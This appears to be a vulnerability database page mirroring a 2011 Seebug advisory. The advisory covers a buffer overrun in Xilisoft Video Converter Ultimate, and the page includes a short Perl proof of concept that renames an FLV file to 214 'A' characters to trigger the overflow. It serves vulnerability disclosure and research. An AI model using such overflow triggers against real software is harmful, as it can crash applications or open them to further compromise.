Lucene search
K

Xilisoft Video Converter Ultimate ".flv"文件缓冲区溢出漏洞

🗓️ 08 Apr 2011 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 18 Views

Xilisoft Video Converter Ultimate ".flv"文件缓冲区溢出漏洞. Buffer OverRu

Code

                                                #!/usr/bin/perl

###
# Title : Xilisoft Video Converter Ultimate Buffer OverRun
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer OverRun
# Tested on : Windows XP Sp3 Fr
# Target :   Xilisoft Video Converter Ultimate
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n[*] FLV name [Ex : video] >";
chomp ($song = <STDIN>);
$junk = "\x41" x 214;
# Rename The FLV Video  To Buffer Overrun :
rename ("$song.flv", "$junk.flv");
print "\n[+] File successfully Rename! \n";
exit;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Apr 2011 00:00Current
6.9Medium risk
Vulners AI Score6.9
18